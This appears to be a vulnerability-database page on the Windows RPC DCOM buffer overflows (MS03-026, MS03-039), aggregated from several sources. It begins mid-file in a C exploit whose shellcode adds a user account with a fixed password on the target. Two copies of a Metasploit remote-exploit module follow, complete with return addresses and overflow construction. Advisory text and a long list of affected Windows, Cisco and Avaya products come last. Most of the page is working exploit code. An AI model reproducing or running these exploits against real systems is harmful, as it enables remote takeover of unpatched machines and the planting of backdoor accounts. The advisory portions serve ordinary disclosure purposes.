	printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
			"Base on flashsky's MS03-026 exp\n"
			"Code by ey4s<eyas#xfocus.org>\n"
			"2003-09-16\n"
			"Welcome to http://www.xfocus.net\n"
			"Thanks to flashsky & benjurry & Dave Aitel\n"
			"If success, target will add a user \"e\" and password is \"asd#321\"\n\n");

	if(argc!=3)
	{
		printf("Usage: %s <target> <type>\n", argv[0]);
		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
			printf( "<%d>   %s\n"
					"      TopSeh=0x%.8x in %s\n"
					"      JmpAddr=0x%.8x in %s\n",
					i, targets[i].os,
					targets[i].dwTopSeh, targets[i].seh,
					targets[i].dwJmpAddr, targets[i].jmp);
		return;
	}

	iType = atoi(argv[2]);
	if((iType<0) || iType >= sizeof(targets)/sizeof(v))
	{
		printf("[-] Wrong type.\n");
		return;
	}

	memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
	memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);
	memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);
	printf("[+] Prepare shellcode completed.\n");

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
    
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
	printf("[+] Connect to %s:135 success.\n", argv[1]);

	if(sizeof(sc_add_user) > sc_max)
	{
		printf("[-] shellcode too long, exit.\n");
		return;
	}

 
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;  // compute the file name length in wide characters
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;// compute the file name length in wide characters
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
    //¼ÆËã¸÷ÖֽṹµÄ³¤¶È
    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;

    len = send(sock,bindstr,sizeof(bindstr),0);
	if(len<=0)
    {
            printf("[-] Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
 	else
		printf("[+] send %d bytes.\n", len);
	
    len=recv(sock,buf1,1000,0);
	if(len<=0)
	{
		printf("[-] recv error:%d\n", GetLastError());
		return;
	}
	else
		printf("[+] recv %d bytes.\n", len);

    len = send(sock,buf2,len1,0);
	if(len<=0)
    {
            printf("[-] Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
	else
		printf("[+] send %d bytes.\n", len);
    len=recv(sock,buf1,1024,0);
	if(len<=0)
	{
		printf("[+] Target crash or exploit success? :)\n");
	}
	else
		printf("[-] recv %d bytes. Bad luck!\n", len);
}



// milw0rm.com [2003-09-16]
		

- Vulnerability information (16749)

Microsoft RPC DCOM Interface Overflow (EDBID:16749)
windows remote
2011-01-11 Verified
0 metasploit
N/A
##
# $Id: ms03_026_dcom.rb 11545 2011-01-11 17:56:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::DCERPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RPC DCOM Interface Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
				was originally found by the Last Stage of Delirium research group and has been
				widely exploited ever since. This module can exploit the English versions of
				Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
			},
			'Author'         => [ 'hdm', 'spoonm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11545 $',
			'References'     =>
				[
					[ 'CVE', '2003-0352'  ],
					[ 'OSVDB', '2100'     ],
					[ 'MSB',   'MS03-026' ],
					[ 'BID', '8205'       ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'    => 880,
					'MinNops'  => 300,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
					'StackAdjustment' => -3500
				},
			'Targets'        =>
				[
					# Target 0: Universal
					[
						'Windows NT SP3-6a/2000/XP/2003 Universal',
						{
							'Platform' => 'win',
							'Rets'     =>
								[
									0x77f33723, # Windows NT 4.0 SP6a (esp)
									0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
									0x010016c6, # Windows 2000 Universal (ebx)
									0x01001c59, # Windows XP SP0/SP1 (pop pop ret)
									0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls - thanks Litchfield!)
									0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
									0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
								],
						},
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jul 16 2003'))
	end

	def autofilter
		# Common vulnerability scanning tools report port 445/139
		# due to how they test for the vulnerability. Remap this
		# back to 135 for automated exploitation

		rport = datastore['RPORT'].to_i
		if ( rport == 139 or rport == 445 )
			datastore['RPORT'] = 135
		end

		true
	end

	def exploit
		connect
		print_status("Trying target #{target.name}...")

		handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		# Carefully create the combination of addresses and code for cross-os exploitation
		xpseh = rand_text_alphanumeric(360, payload_badchars)

		# Jump to [esp-4] - (distance to shellcode)
		jmpsc =
			"\x8b\x44\x24\xfc"      + 		# mov eax,[esp-0x4]
			"\x05\xe0\xfa\xff\xff"  + 		# add eax,0xfffffae0 (sub eax, 1312)
			Rex::Arch::X86.jmp_reg('eax') 	# jmp eax

		# Jump to [ebp+0x30] - (distance to shellcode) - thanks again Litchfield!
		jmpsc2k3 =
			"\x8b\x45\x30"         + 		# mov eax,[ebp+0x30]
			"\x05\x24\xfb\xff\xff" + 		# add eax,0xfffffb24 (sub 1244)
			Rex::Arch::X86.jmp_reg('eax') 	# jmp eax

		# Windows 2003 added by spoonm
		xpseh[ 246 - jmpsc2k3.length, jmpsc2k3.length ] = jmpsc2k3
		xpseh[ 246, 2 ] = Rex::Arch::X86.jmp_short("$-#{jmpsc2k3.length}")
		xpseh[ 250, 4 ] = [ target['Rets'][4] ].pack('V')

		xpseh[ 306, 2 ] = Rex::Arch::X86.jmp_short('$+8')
		xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V')
		xpseh[ 314, jmpsc.length ] = jmpsc

		#
		# NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
		# NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
		# HD wrote NT 4.0 SP6a, and it's off in a different place
		#
		# Our NT 4.0 SP3/SP4/SP5 overwrites will look something like this:
		# (hopefully I'm accurate, this is from my memory...)
		#
		# |---pop pop ret--------        --eax---|
		# V                     |        |       V
		# [ jmp +17 ] [ ret sp3/4 ] [ ret sp5 ] [ jmpback sp5 ] [ jmpback sp3/4 ]
		#     4             4           4              5               5
		#     |                                                 ^
		#     --------------------------------------------------|
		# The jmpback's all are 5 byte backwards jumps into our shellcode that
		# sits just below these overwrites...
		#

		nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") +
			rand_text(2, payload_badchars)

		nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
		nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
		ntshiz =
			nt4sp3jmp +
			[ target['Rets'][6] ].pack('V') +
			[ target['Rets'][5] ].pack('V') +
			nt4sp5jmpback +
			nt4sp3jmpback

		# Pad to the magic value of 118 bytes
		ntshiz += rand_text(118 - ntshiz.length, payload_badchars)

		# Create the evil UNC path used in the overflow
		uncpath =
			Rex::Text.to_unicode("\\\\") +
			make_nops(32) +

			# When attacking NT 4.0, jump over 2000/XP return
			Rex::Arch::X86.jmp_short(16) +
			Rex::Arch::X86.jmp_short(25) +

			[ target['Rets'][2] ].pack('V') +   # Return address for 2000 (ebx)
			[ target['Rets'][0] ].pack('V') +   # Return address for NT 4.0 SP6 (esi)
			[ target['Rets'][1] ].pack('V') +   # Writable address on 2000 and jmp for NT 4.0
			make_nops(88) +
			Rex::Arch::X86.jmp_short(4) +
			rand_text(4, payload_badchars) +
			make_nops(8) +
			Rex::Arch::X86.jmp_short(4) +
			Rex::Arch::X86.jmp_short(4) +
			make_nops(4) +
			Rex::Arch::X86.jmp_short(4) +
			rand_text(4, payload_badchars) +
			payload.encoded +
			ntshiz +
			xpseh +
			Rex::Text.to_unicode("\\\x00")

		# This is the rpc cruft needed to trigger the vuln API
		stubdata =
			NDR.short(5) +
			NDR.short(1) +
			NDR.long(0) +
			NDR.long(0) +

			rand_text(16) +

			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +

			NDR.long(rand(0xFFFFFFFF)) +

			NDR.UnicodeConformantVaryingStringPreBuilt(uncpath) +

			NDR.long(0) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF))

		print_status('Sending exploit ...')
		begin
			dcerpc_call(0, stubdata, nil, false)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect
	end

end
		

- Vulnerability information (22917)

Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (EDBID:22917)
windows remote
2003-08-11 Verified
0 aT4r@3wdesign.es
N/A
source: http://www.securityfocus.com/bid/8205/info
   
A buffer overrun vulnerability has been reported in Microsoft Windows that can be exploited remotely via a DCOM RPC interface that listens on TCP/UDP port 135. The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system.
   
This issue may be exposed on other ports that the RPC Endpoint Mapper listens on, such as TCP ports 139, 135, 445 and 593. This has not been confirmed. Under some configurations the Endpoint Mapper may receive traffic via port 80.
   
** There have been unconfirmed reports that Windows 9x systems with certain software installed may also be vulnerable to this issue. Reportedly, Windows 98 systems with .NET software installed may be vulnerable according to scans using various DCOM RPC vulnerability scanning tools. Symantec has not confirmed this behaviour and it may in fact be due to false positives generated by the scanners.

http://www.exploit-db.com/sploits/22917.zip		

- Vulnerability information (F83012)

Microsoft RPC DCOM Interface Overflow (PacketStormID:F83012)
2009-11-26 00:00:00
H D Moore,spoonm,cazz  metasploit.com
exploit,overflow
windows,2k,nt,xp
CVE-2003-0352

This Metasploit module exploits a stack overflow in the RPCSS service; the vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This Metasploit module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::DCERPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RPC DCOM Interface Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the RPCSS service, this vulnerability
				was originally found by the Last Stage of Delirium research group and has been
				widely exploited ever since. This module can exploit the English versions of
				Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
			},
			'Author'         => [ 'hdm', 'spoonm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0352'  ],
					[ 'OSVDB', '2100'     ],
					[ 'MSB',   'MS03-026' ],
					[ 'BID', '8205'       ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'    => 880,
					'MinNops'  => 300,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					# Target 0: Universal
					[ 
						'Windows NT SP3-6a/2000/XP/2003 Universal',
						{
							'Platform' => 'win',
							'Rets'     => 
								[
									0x77f33723, # Windows NT 4.0 SP6a (esp)
									0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
									0x0018759f, # Windows 2000 Universal (ebx)
									0x01001c59, # Windows XP SP0/SP1 (pop pop ret)
									0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls - thanks Litchfield!)
									0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
									0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
								],
						},
					],
				],
			'DefaultTarget' => 0))
	end

	def autofilter
		# Common vulnerability scanning tools report port 445/139
		# due to how they test for the vulnerability. Remap this
		# back to 135 for automated exploitation
		
		rport = datastore['RPORT'].to_i
		if ( rport == 139 or rport == 445 )
			datastore['RPORT'] = 135
		end
		
		true
	end
		
	def exploit
		connect
		print_status("Trying target #{target.name}...")
	
		handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")
				
		# Carefully create the combination of addresses and code for cross-os exploitation
		xpseh = rand_text_alphanumeric(360, payload_badchars)
		
		# Jump to [esp-4] - (distance to shellcode)
		jmpsc =
			"\x8b\x44\x24\xfc"      + 		# mov eax,[esp-0x4]
			"\x05\xe0\xfa\xff\xff"  + 		# add eax,0xfffffae0 (sub eax, 1312)
			Rex::Arch::X86.jmp_reg('eax') 	# jmp eax

		# Jump to [ebp+0x30] - (distance to shellcode) - thanks again Litchfield!
		jmpsc2k3 =
			"\x8b\x45\x30"         + 		# mov eax,[ebp+0x30]
			"\x05\x24\xfb\xff\xff" + 		# add eax,0xfffffb24 (sub 1244)
			Rex::Arch::X86.jmp_reg('eax') 	# jmp eax

		# Windows 2003 added by spoonm
		xpseh[ 246 - jmpsc2k3.length, jmpsc2k3.length ] = jmpsc2k3
		xpseh[ 246, 2 ] = Rex::Arch::X86.jmp_short("$-#{jmpsc2k3.length}")
		xpseh[ 250, 4 ] = [ target['Rets'][4] ].pack('V')

		xpseh[ 306, 2 ] = Rex::Arch::X86.jmp_short('$+8')
		xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V')
		xpseh[ 314, jmpsc.length ] = jmpsc
		
		#
		# NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
		# NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
		# HD wrote NT 4.0 SP6a, and it's off in a different place
		#
		# Our NT 4.0 SP3/SP4/SP5 overwrites will look something like this:
		# (hopefully I'm accurate, this is from my memory...)
		#
		# |---pop pop ret--------        --eax---|
		# V                     |        |       V
		# [ jmp +17 ] [ ret sp3/4 ] [ ret sp5 ] [ jmpback sp5 ] [ jmpback sp3/4 ]
		#     4             4           4              5               5
		#     |                                                 ^
		#     --------------------------------------------------|
		# The jmpback's all are 5 byte backwards jumps into our shellcode that
		# sits just below these overwrites...
		#

		nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") + 
	            	rand_text(2, payload_badchars)		

		nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
		nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
		ntshiz = 
			nt4sp3jmp + 
			[ target['Rets'][6] ].pack('V') + 
			[ target['Rets'][5] ].pack('V') +
			nt4sp5jmpback + 
			nt4sp3jmpback

		# Pad to the magic value of 118 bytes
		ntshiz += rand_text(118 - ntshiz.length, payload_badchars)		
		
		# Create the evil UNC path used in the overflow
		uncpath = 
			Rex::Text.to_unicode("\\\\") + 
			make_nops(32) +
			
			# When attacking NT 4.0, jump over 2000/XP return
			Rex::Arch::X86.jmp_short(16) +
			Rex::Arch::X86.jmp_short(25) +
			
			[ target['Rets'][2] ].pack('V') +   # Return address for 2000 (ebx)
			[ target['Rets'][0] ].pack('V') +   # Return address for NT 4.0 SP6 (esi)
			[ target['Rets'][1] ].pack('V') +   # Writable address on 2000 and jmp for NT 4.0
			make_nops(88) +
			Rex::Arch::X86.jmp_short(4) +
			rand_text(4, payload_badchars) +
			make_nops(8) +
			Rex::Arch::X86.jmp_short(4) +
			Rex::Arch::X86.jmp_short(4) +
			make_nops(4) +
			Rex::Arch::X86.jmp_short(4) +
			rand_text(4, payload_badchars) +
			payload.encoded + 
			ntshiz + 
			xpseh +
			Rex::Text.to_unicode("\\\x00")

		# This is the rpc cruft needed to trigger the vuln API
		stubdata =
			NDR.short(5) +
			NDR.short(1) +
			NDR.long(0) +
			NDR.long(0) +

			rand_text(16) + 

			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +
			NDR.long(0) +

			NDR.long(rand(0xFFFFFFFF)) +

			NDR.UnicodeConformantVaryingStringPreBuilt(uncpath) +

			NDR.long(0) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +
			NDR.long(rand(0xFFFFFFFF)) +

			NDR.long(1) +
			NDR.long(1) +
			NDR.long(rand(0xFFFFFFFF))
		
		print_status('Sending exploit ...')
		begin
			dcerpc_call(0, stubdata)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect	
	end

end
    

- Vulnerability information

2100
Microsoft Windows RPC DCOM Interface Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- Vulnerability description

Microsoft Windows platforms contain a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a flaw in the Remote Procedure Call (RPC) Distributed Component Object Model (DCOM) interface that does not properly sanitize remote requests. If an attacker sends a specially crafted message to the server, they may be able to crash the service or execute arbitrary code with SYSTEM privileges.

- Timeline

2003-07-16 Unknown
2003-07-16 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability
Boundary Condition Error 8205
Yes No
2003-07-16 12:00:00 2009-07-11 10:56:00
Discovery of this vulnerability has been credited to The Last Stage of Delirium Research Group.

- Affected versions

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Compaq OpenVMS 7.3 -1 Alpha
Compaq OpenVMS 7.3 VAX
Compaq OpenVMS 7.3 Alpha
Compaq OpenVMS 7.2.1 Alpha
Compaq OpenVMS 7.2 -2 Alpha
Compaq OpenVMS 7.2 -1H2 Alpha
Compaq OpenVMS 7.2 -1H1 Alpha
Compaq OpenVMS 7.2 VAX
Compaq OpenVMS 7.2 Alpha
Compaq OpenVMS 7.1 -2 Alpha
Compaq OpenVMS 7.1 VAX
Compaq OpenVMS 7.1 Alpha
Compaq OpenVMS 6.2 -1H3 Alpha
Compaq OpenVMS 6.2 -1H2 Alpha
Compaq OpenVMS 6.2 -1H1 Alpha
Compaq OpenVMS 6.2 VAX
Compaq OpenVMS 6.2 Alpha
Cisco Wireless Lan Solution Engine
Cisco VPN/Security Management Solution
Cisco Voice Manager
Cisco User Registration Tool
Cisco uOne Enterprise Edition
Cisco uOne 4.0
Cisco uOne 3.0
Cisco uOne 2.0
Cisco uOne 1.0
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Unity Server
Cisco Transport Manager
Cisco Trailhead
Cisco SN 5420 Storage Router 1.1.3
Cisco SN 5420 Storage Router 1.1 (7)
Cisco SN 5420 Storage Router 1.1 (5)
Cisco SN 5420 Storage Router 1.1 (4)
Cisco SN 5420 Storage Router 1.1 (3)
Cisco SN 5420 Storage Router 1.1 (2)
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0
Cisco Small Network Management Solution
Cisco Service Management
Cisco Secure Scanner
Cisco Secure Policy Manager 3.0.1
Cisco Secure ACS for Windows Server 3.2
Cisco Secure ACS for Windows NT 3.1.1
Cisco Secure ACS for Windows NT 3.0.3
Cisco Secure ACS for Windows NT 3.0 .1
Cisco Secure ACS for Windows NT 3.0
Cisco Secure ACS for Windows NT 2.6.4
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6.3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
